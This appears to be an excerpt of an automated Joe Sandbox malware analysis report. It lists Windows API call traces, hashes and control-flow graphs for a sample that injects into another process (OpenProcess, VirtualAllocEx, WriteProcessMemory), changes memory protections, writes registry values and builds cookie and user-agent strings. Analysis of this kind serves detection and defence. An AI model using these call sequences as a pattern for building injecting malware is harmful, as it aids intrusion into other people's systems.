              • CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143369
              • CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143375
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
              • Instruction ID: 4cd5b16b65aed1705d1736721d35a9cb0c295b654d319e0244a35bd1912b05eb
              • Opcode Fuzzy Hash: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
              • Instruction Fuzzy Hash: B81103B2444514AEEF126B60CC84FAFB7FDEF40706F0544A9E999A6045DF345680CEA1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
              • Instruction ID: c7485b42a56dfa788a16c5305a251ae6568656de49255e47a5d89b7acae85cb3
              • Opcode Fuzzy Hash: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
              • Instruction Fuzzy Hash: 581103B2404554AFEF136B60CD85FAFB7FDEF60305F0544ADE585A6045DB349A80CEA1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 021432E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 02143330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,021432B1,00000011,?,00000000,00A00000), ref: 0214335D
              • CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143369
              • CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143375
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
              • Instruction ID: 2b0b92872bcc1bd77b7df1e3dd6dcfbe6762bf4904733bca868cea0daf051ec0
              • Opcode Fuzzy Hash: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
              • Instruction Fuzzy Hash: 891121B28445589EEF136B60CC84FAFB7F9EF40306F4144E9E999EA045DF305680CE91
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
              • Instruction ID: ac9927580557797ac402c103fd79d00d7d15eeabf0bd26a871240790a05aac25
              • Opcode Fuzzy Hash: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
              • Instruction Fuzzy Hash: 7E111FB28045589FEF136B60CC89FAFB7F8EF60305F0144A9E985AA045DB349A80CE91
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Process$Window$ExitFindLibraryLoadOpenThread
              • String ID:
              • API String ID: 3976292551-0
              • Opcode ID: ce9b35de20eebca6936680f36fda4bea56ec7dc78ef505b7866e1d0899d6ccfe
              • Instruction ID: 07c3d123508853dca01113f4f655de642387f93dacd2774d20cb62f5208d7357
              • Opcode Fuzzy Hash: ce9b35de20eebca6936680f36fda4bea56ec7dc78ef505b7866e1d0899d6ccfe
              • Instruction Fuzzy Hash: CC11E5759843056FEB152BB18C88FAA365C9F08714F0904A6BF4CEF095EF7098418BB9
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$Window$ExitFindLibraryLoadOpenThread
              • String ID:
              • API String ID: 3976292551-0
              • Opcode ID: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
              • Instruction ID: 21096797c2136e07da87d67eb28ce3356d04a0ee0ec389f9400993a79b57079d
              • Opcode Fuzzy Hash: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
              • Instruction Fuzzy Hash: 6111E575944305ABEF026AB08C89FAA375C9F38704F0944AABD55EF096DB70DC41C7B5
              APIs
              • LoadLibraryA.KERNEL32(02140B61,00000007,?,00000000), ref: 02140B6D
                • Part of subcall function 02140CDD: GetProcAddress.KERNEL32(00000000,021404B1), ref: 02140CEA
                • Part of subcall function 02140BA6: FindWindowA.USER32(02140B98,0000000E), ref: 02140BAB
                • Part of subcall function 02140BA6: GetWindowThreadProcessId.USER32(00000000), ref: 02140BB8
                • Part of subcall function 02140BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 02140BC5
                • Part of subcall function 02140BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 02140BE7
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
              • String ID:
              • API String ID: 3081398214-0
              • Opcode ID: 7d0d2a55b224f60994a051d836d7d629a627f4684472feeea615a9bb8e083137
              • Instruction ID: 7cf0929ae1df50ac4d486775f7624933496b5ac0455d0b6a2a3dfbca9e2ae5a3
              • Opcode Fuzzy Hash: 7d0d2a55b224f60994a051d836d7d629a627f4684472feeea615a9bb8e083137
              • Instruction Fuzzy Hash: 2A01D675A843057FEF152B718C88FAE365C6F08715F0900A5BE4DEE1D6EFB084418AB8
              APIs
              • LoadLibraryA.KERNEL32(001C0B61,00000007,?,00000000), ref: 001C0B6D
                • Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA
                • Part of subcall function 001C0BA6: FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
                • Part of subcall function 001C0BA6: GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
                • Part of subcall function 001C0BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5
                • Part of subcall function 001C0BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
              • String ID:
              • API String ID: 3081398214-0
              • Opcode ID: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
              • Instruction ID: aba8e1325fc70c5bdf08b0507d9e73b3b069cfc1834b77748dc634d74a94ba5d
              • Opcode Fuzzy Hash: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
              • Instruction Fuzzy Hash: 0A01D175A44305BBEF026A708C89FAE365CAF28700F0904A9BD55EE1D6DBB0CC41C6B4
              APIs
              • LoadLibraryA.KERNEL32(02141522,00000006,?,00000000), ref: 0214152D
                • Part of subcall function 02140CDD: GetProcAddress.KERNEL32(00000000,021404B1), ref: 02140CEA
                • Part of subcall function 02141386: VirtualProtect.KERNEL32(?,00000020,00000040,?,?,?,?,?,?,?,?,?,0214155C,02141439,00000000,02141439), ref: 021413B3
                • Part of subcall function 02141386: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,0214155C,02141439,00000000,02141439), ref: 021413C8
                • Part of subcall function 02141386: VirtualProtect.KERNEL32(?,00000020,?,02141434,?,?,?,?,?,?,?,?,0214155C,02141439,00000000,02141439), ref: 0214142F
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$AddressAllocLibraryLoadProc
              • String ID: `/8w$p/8w$-8w
              • API String ID: 2821516111-1988377448
              • Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction ID: e65ade6c102ae6075eef00eb2b9b101081450e0f56294fc1d504775b0ed55cb0
              • Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction Fuzzy Hash: 4D117D72404514AEDF03AF60C5C4CAA73EDAF40718B45096A9D8DEE449EF749194CEE5
              APIs
              • FindWindowA.USER32(02140B98,0000000E), ref: 02140BAB
              • GetWindowThreadProcessId.USER32(00000000), ref: 02140BB8
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 02140BC5
                • Part of subcall function 02140E21: VirtualAllocEx.KERNEL32(0000094C,00000000,021459C8,00003000,00000040,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E47
                • Part of subcall function 02140E21: WriteProcessMemory.KERNEL32(0000094C,02140000,00000000,021459C8,00000000,?,02140DC9,00000000,0000094C,00000000), ref: 02140E65
                • Part of subcall function 02140E21: IsWow64Process.KERNEL32(0000094C,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E7B
              • ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 02140BE7
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
              • String ID:
              • API String ID: 1790362231-0
              • Opcode ID: bc2bbfce36d30a6fefd0dad73d042fdf8fb168c32effb32c2ae76050913c3bbc
              • Instruction ID: 933868a361253e5ee509ed10fe8711ef2c6159eb8607de920da898343328322e
              • Opcode Fuzzy Hash: bc2bbfce36d30a6fefd0dad73d042fdf8fb168c32effb32c2ae76050913c3bbc
              • Instruction Fuzzy Hash: FF112775688245AFEF1527328D54F2A3B695F06714F1D00E5EA0CDF0A3DF30C90A9AB8
              APIs
              • FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
              • GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5
                • Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
                • Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
                • Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
              • ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
              • String ID:
              • API String ID: 1790362231-0
              • Opcode ID: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
              • Instruction ID: 8d2a110fdadbfcb79557eef3c6f04e088fde0ec6edb1f3a929b01c2de3428793
              • Opcode Fuzzy Hash: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
              • Instruction Fuzzy Hash: 5F11C465649241AEEF1367708D55F6A3B695F36700F1941DDF8149E0A3DB60CC02D678
              APIs
              • CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 021426E8
              • GetFileSize.KERNEL32(?,00000000), ref: 02142701
              • ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 02142722
              • CloseHandle.KERNEL32(?), ref: 02142733
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: b7d2a57123e67cbd1f37554cf7139a6097d3d890f97c631bd6fa19753a851766
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: 8E01E830640209BBEF119F60CC46F9DBAB8AF10B45F2041A9BE18F91E0DB70A661DA18
              APIs
              • CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 001C26E8
              • GetFileSize.KERNEL32(?,00000000), ref: 001C2701
              • ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 001C2722
              • CloseHandle.KERNEL32(?), ref: 001C2733
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: 1b7016d98d2ac921908da5a69b0d089c21a15c5119871dbff96ca870c68476b5
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: 9D01EC30640309BBEF119F60CC8AF9D7AB4AF20B44F1041A9EA14F91E0D770AA619A18
              APIs
              • CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 0214275C
              • SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 02142779
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02142795
              • CloseHandle.KERNEL32(?), ref: 021427A6
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: 3152cfd918847eea9f15cbb022346a35c703c1caae71cc56eea7665c69851af8
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction Fuzzy Hash: D901F630640209BFEF119FA0DC45F8DBEB5BF04B15F2041A8BE14BD1E5DB71AA60AB54
              APIs
              • CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 001C275C
              • SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 001C2779
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 001C2795
              • CloseHandle.KERNEL32(?), ref: 001C27A6
              Memory Dump Source
              • Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_1c0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: e83ab4e8bfacfcbb9057bf8691385a7719df8e694ba331f985fc6044b9c84708
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction Fuzzy Hash: E501E430640209FFEF119FA0DC86F8D7AB5AF14B14F2041A8BA14B91E5D771AA20AB54
              APIs
              • RegCreateKeyExA.ADVAPI32(00000000,0214086F,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 021408A5
              • lstrlen.KERNEL32(80000001), ref: 021408AE
              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,80000001,00000000), ref: 021408CC
              • RegCloseKey.ADVAPI32(?), ref: 021408D8
              Memory Dump Source
              • Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_2140000_bin.jbxd
              Similarity
              • API ID: CloseCreateValuelstrlen
              • String ID:
              • API String ID: 1356686001-0
              • Opcode ID: 820b913730b8b1205efda1ba5cf004e50c56167a5a19f0837e88c4a92b8022be
              • Instruction ID: 71657a73426316f7f99f7eea358e922308814917e668a8bed2c713ca4b7d17c0
              • Opcode Fuzzy Hash: 820b913730b8b1205efda1ba5cf004e50c56167a5a19f0837e88c4a92b8022be
              • Instruction Fuzzy Hash: 4BE09272100018BFEF126F60DC89E997B76EF54305F1440A0FE4AAD0B5CBB19AA0DF68

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 234097f-23409a0 call 2340d05 call 2341506 call 2343dc8 8 23409a8-23409ca 0->8 10 23409d0-2340a29 call 2340a1a call 234375b 8->10 11 2340b32-2340b33 8->11 19 2340b2d call 2340b34 10->19 20 2340a2f-2340a51 10->20 19->11 20->19 23 2340a57-2340a7c 20->23 23->19 25 2340a82-2340ac1 23->25 25->19 27 2340ac3-2340aef 25->27 27->19 29 2340af1-2340afd 27->29 31 2340b02-2340b26 29->31 31->11 34 2340b28-2340b2b 31->34 34->19 34->31
              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 73f7dd05df2c3e4670bc0233410b8aa763c4ff8ff0558656eca81f311a437329
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: D3416F71640214AFEB269F60CC85FA977ECEF44744F0401D5BB49BE0D5DBB0A690CE69

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 2341386-2341393 36 2341435-2341436 35->36 37 2341399-234139f 35->37 37->36 38 23413a5-23413bb 37->38 38->36 40 23413bd-23413d0 38->40 42 23413d2-23413d9 40->42 43 23413dc-23413ec call 2340ebd 42->43 46 23413ee-23413fc 43->46 47 2341401-234142c 46->47 48 23413fe 46->48 47->36 48->47
              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 2aa286ea0953e27a0ff4016d4f5364c36456e627daa9693dad06d4d7939534c6
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 32219D31A0021AAFDB11DF78C848B9DBBF5AF04714F458265F999AF2D0EB70E810CB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
              • Instruction ID: c19063a0d35016acd4fc3c094487242e3f66d2355471c88c964ea10eabb2b839
              • Opcode Fuzzy Hash: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
              • Instruction Fuzzy Hash: 4E1191724045149EDF13AF60C5C4CAA73EDEE40708B4509AA9DC9EF44DEF74A194CEE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 23409a8-23409ca 69 23409d0-2340a29 call 2340a1a call 234375b 67->69 70 2340b32-2340b33 67->70 78 2340b2d call 2340b34 69->78 79 2340a2f-2340a51 69->79 78->70 79->78 82 2340a57-2340a7c 79->82 82->78 84 2340a82-2340ac1 82->84 84->78 86 2340ac3-2340aef 84->86 86->78 88 2340af1-2340afd 86->88 90 2340b02-2340b26 88->90 90->70 93 2340b28-2340b2b 90->93 93->78 93->90
              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: ebc7dddeaa83895b0c0178e082e3d95b77ed7de3ef5d33ce06aab4c619e48dc5
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: 7201F971644318AFEB12DE50CC45FA573FCEF44B04F500595BB45EE0C5EAB065448AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 2343fde-2343ffa call 234375b call 23438a7 99 234400c-234403b call 234404d * 3 94->99 100 2343ffc-234400a call 234411e 94->100 113 2344046 99->113 107 234404b-234404c 100->107 113->107 114 2344046 call 234404d 113->114 114->107
              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: 47aa32b92589f91f5a0737d58e4b279e43eb358cc1bfdb16babc015b37f305af
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: 86F03070548280E7FB707BB0AC89B4DB6E99F01709F0400E0EB49BF495CE7874608E72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 23447f7-2344810 call 2343b24 118 2344820-2344850 115->118 119 2344812-234481b call 2343b76 115->119 122 2344856-2344878 118->122 123 234496a-234496f 118->123 119->118 122->123 125 234487e-23448a3 122->125 127 23448a5-23448ba 125->127 128 23448bb-23448dd 125->128 127->128 130 2344942-234494c 128->130 131 23448df-2344901 128->131 132 2344963-2344968 130->132 133 234494e-2344960 call 234377b 130->133 131->130 136 2344903-2344925 131->136 132->123 133->132 136->130 139 2344927-234493f 136->139 139->130
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: 5c3abeb0560b008391e0d6cc2056a90345e9dc48dde703bc97eae87da102004d
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: B94162B2604208BFEF129F64CC44BDEBBB9FF84744F1540A9EA44AB154DB709650DB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 23447f8-2344803 141 234480e-2344810 140->141 142 2344809 call 2343b24 140->142 143 2344820-2344850 141->143 144 2344812-234481b call 2343b76 141->144 142->141 147 2344856-2344878 143->147 148 234496a-234496f 143->148 144->143 147->148 150 234487e-23448a3 147->150 152 23448a5-23448ba 150->152 153 23448bb-23448dd 150->153 152->153 155 2344942-234494c 153->155 156 23448df-2344901 153->156 157 2344963-2344968 155->157 158 234494e-2344960 call 234377b 155->158 156->155 161 2344903-2344925 156->161 157->148 158->157 161->155 164 2344927-234493f 161->164 164->155
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.3362098346.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_2340000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: 8b6a152347b2c2fe077d5667fbdf11befb22a919a8ef97c7d7c1d081940ce608
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: D94151B2600208BFEF129F64CC48BDEBBB9FF84744F1540A9EA44AB154DB70A650DB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: c6111cb3902a05132986dd9956a33f51c7bafc97d0e0039d67a0bb8fc18cec66
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 7C415171640214AFEF129F64CC85FAA77BCEF44744F080195BA49FE0D6DB70AA90CE65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 15 d61386-d61393 16 d61435-d61436 15->16 17 d61399-d6139f 15->17 17->16 18 d613a5-d613bb 17->18 18->16 20 d613bd-d613d0 18->20 22 d613d2-d613d9 20->22 23 d613dc-d613ec call d60ebd 22->23 26 d613ee-d613fc 23->26 27 d61401-d6142c 26->27 28 d613fe 26->28 27->16 28->27
              Memory Dump Source
